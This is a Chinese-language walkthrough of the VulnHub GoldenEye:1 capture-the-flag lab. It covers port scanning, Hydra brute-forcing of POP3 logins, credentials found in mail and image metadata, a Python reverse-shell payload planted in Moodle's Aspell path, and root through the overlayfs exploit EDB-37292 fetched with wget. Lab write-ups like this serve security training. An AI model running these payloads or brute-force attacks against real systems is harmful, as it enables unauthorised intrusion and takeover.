vulnhub靶机渗透[GoldenEye-1]

发布日期

名称：GoldenEye：1
发布日期：2018年5月4日

下载

• Download: https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq
• Download (Mirror): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
• Download (Torrent): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova.torrent

描述

级别：中级

最近完成了创建OSCP型易受攻击的计算机的工作，该计算机的主题是伟大的James Bond电影（甚至更好的n64游戏）GoldenEye。目标是root并捕获秘密的GoldenEye代码-flag.txt。我认为它是中级的，它具有root所需的多种技术-没有漏洞利用开发/缓冲区溢出。在完成OSCP之后，我认为这将是一个不错的实践，另外还有一点CTF风味。我已经在VMware和VirtualBox上创建并验证。除了默认情况下，您不需要其他工具。将需要设置为“host only”，并且在VMware上，由于格式化，在最初启动它时，如果出现提示，可能需要单击“重试”。

Beta-2018-05-02 v1-2018-05-04

GoldenEye是由creosote发起并在Vulnhub举办的一项以秘密服务为主题的挑战。GoldenEye是一个CTF样式的框，而不是现实的渗透测试方案。此框需要相当多的“即开即用”的思想，才能找到根源。

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.101
Host is up (0.00025s latency).
MAC Address: 08:00:27:3B:86:3C (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -n -Pn -v -sV 192.168.56.101
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d

除了在端口80上运行的Web应用程序之外，还有两个pop3端口和一个smtp端口。建议使用主应用程序导航到/sev-home/。但是，该应用程序在浏览到/sev-home/时提示输入用户名和密码，而我对凭证还一无所知。

root@kali:~# nmap -p 25,80,55006,55007 -A -v -Pn -n -sV -T5 --script=vuln --min-rate=10000 192.168.56.101
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://weakdh.org
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown: 
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
55006/tcp open  ssl/unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown: 
55007/tcp open  pop3        Dovecot pop3d
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:

是时候深入挖掘了！在页面的HTML源代码中，找出了负责漂亮的首页动画的JavaScript文件。在terminal.js上，我找到了第一个提示。用于以HTML编码编码的boris的硬编码密码，这对于解码非常简单。我获得了访问该应用程序的凭据。

InvincibleHack3r

===>

InvincibleHack3r

得到账号密码：boris/InvincibleHack3r，然后登录

访问该应用程序没有任何用处。尝试使用相同的凭据访问pop3服务，并检查了鲍里斯经纪人是否有任何有趣的电子邮件。但是，获得的密码不适合用于pop3访问。老实说，在这里停留了一段时间。
没有其他线索，对使用用户名boris的pop3服务进行了快速的暴力破解。Hydra能够使用Kali中存在的fasttrack.txt单词列表来破解密码。

root@kali:~# hydra -l boris -P /usr/share/wordlists/fasttrack.txt -t20 192.168.56.101 -s55007 -I pop3Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 21:37:45
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 19 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 21:39:45

得到boris/secret1!，然后telnet连接

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

电子邮件通讯的内容不可直接利用，但能够找出执行任务的其他特工的用户名。这也可以用于对其他代理发起相同的攻击。很幸运找到了natalya。

root@kali:~# hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -t64 192.168.56.101 -s55007 -I pop3
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 21:46:23
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 222 login tries (l:1/p:222), ~4 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[55007][pop3] host: 192.168.56.101   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 21:46:39

natalya/bird，登录

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

将关键信息retr 2翻译

好的，娜塔琳，我为你准备了一个新学生。由于这是一个新系统，请让我或鲍里斯知道您是否发现任何配置问题，尤其是它与安全性有关……即使不是与安全有关，也可以以“安全性”为名输入它……无需太多麻烦就可以将变更单升级：)
好的，用户凭证是：

用户名：xenia
密码：RCP90rulez!

鲍里斯（Boris）确认她是有效承包商，所以只需创建帐户就可以了吗？如果您没有外部内部域上的URL，请访问：severnaya-station.com/gnocertdir

**请确保编辑您的主机文件，因为您通常在远程网络外工作。由于您是Linux用户，只需将此服务器IP指向/etc/hosts中的severnaya-station.com。

修改hosts文件将ip:192.168.56.101指向severnaya-station.com，然后访问域名severnaya-station.com/gnocertdir

现在，我可以浏览到severnaya-station.com/gnocertdir以xenia的形式访问培训门户。学习门户使用开源学习平台Moodle托管。无法从门户访问任何课程资料或附件。但是，来自GoldenEye项目主管的Doak博士发了言。他在消息中说，他的电子邮件用户名不正确。我在pop3服务上使用hydra尝试了攻击。

root@kali:~# hydra -l doak -P /usr/share/wordlists/fasttrack.txt -t64 192.168.56.101 -s55007 -I pop3Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 22:21:03
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 222 login tries (l:1/p:222), ~4 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[55007][pop3] host: 192.168.56.101   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 22:21:32

doak/goat,

那是特勤人员可以使用的最愚蠢的密码！不过，我可以使用新发现的凭据访问电子邮件通信。通过电子邮件通信，我发现了以代理Doak身份访问moodle的凭据。

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

username: dr_doak
password: 4England!

我在Doak博士的帐户中发现了一个有趣的附件，该附件说可以从/dir007key/for-007.jpg获取应用程序的管理员凭据。使用隐写术，可以将秘密消息嵌入图像中。

root@kali:~# exiftool 007.jpg 
ExifTool Version Number         : 11.80
File Name                       : 007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2020:01:09 22:37:50-05:00
File Access Date/Time           : 2020:01:09 22:37:50-05:00
File Inode Change Date/Time     : 2020:01:09 22:37:50-05:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066

将Image Description的base64字符串解码得到:xWinter1995x!

然后使用admin/xWinter1995x!登录即可

getshell

• moodle管理员账户远程代码执行

在获得对moodle的管理员访问权后，获得reverse shell相当容易。在“moodle”设置上，存在用于配置系统路径的设置。Aspell是拼写检查器，可以安装在Linux上，并且可以在moodle中用于进行拼写检查操作。每当启动拼写检查动作时，moodle就会调用Aspell二进制文件。可以编辑Aspell的路径以获得reverse shell。以下是我使用的payload。

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

正确设置路径后，即可创建任何博客文章或页面。在编辑器上，可以调用spellcheck函数以获得reverse shell连接。

然后将下图所示设置选项设置成:PspellShell，不设置的话，无法执行之前的payload…

点击上图的按钮之后kali端返回了shell.

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48087
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/sh")'

提权

我首先列举了box的操作系统版本。那是一个Ubuntu 14.04.1 box。在Google的搜索中，我发现该机器容易受到overlayfsEDB-37292攻击。我在kali上编译了它，然后将其转移到目标box中。运行漏洞利用程序时出现错误-sh：1：gcc：找不到。

目标框上没有gcc。如果我们检查exploit-db 37292漏洞利用代码，则在第143行上，您可以看到漏洞利用正在调用gcc。好吧，这很棘手。

我使用linuxprivchecker.py枚举了该框，以枚举已安装的开发工具。box里没有gcc，但是有cc。cc是原始UNIX c编译器命令的名称。对于cc和gcc的确切区别，我不是专家。我尝试在漏洞利用源代码中将gcc更改为cc并进行编译。生成的二进制文件为我root了box。

在kali中编译好exp后，直接wget下载到攻击机的shell中即可，然后赋予777权限，./exp执行，成功提权

$ wget http://192.168.56.102:8000/exp
wget http://192.168.56.102:8000/exp
--2020-01-10 06:24:47--  http://192.168.56.102:8000/exp
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17616 (17K) [application/octet-stream]
Saving to: 'exp'

100%[======================================>] 17,616      --.-K/s   in 0s      

2020-01-10 06:24:47 (331 MB/s) - 'exp' saved [17616/17616]

$ ls
ls
changelog.txt  config.php  editor_plugin.js      exp  includes
classes        css         editor_plugin_src.js  img  rpc.php
$ chmod 777 *
chmod 777 *
$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root

找到flag，帅爆了。。。

# cd /root
cd /root
# ls
ls
# pwd
pwd
/root
# ls -la
ls -la
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

最后的flag是这个

一张动图,蛮有意思的。

• 知识点总结：

1.telnet邮件泄露
2.图片隐写
3.moodle管理员账户远程代码执行
4.Ubuntu 14.04.1版本提权
5.exp overlayfs[EDB-37292] 编译cc执行

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…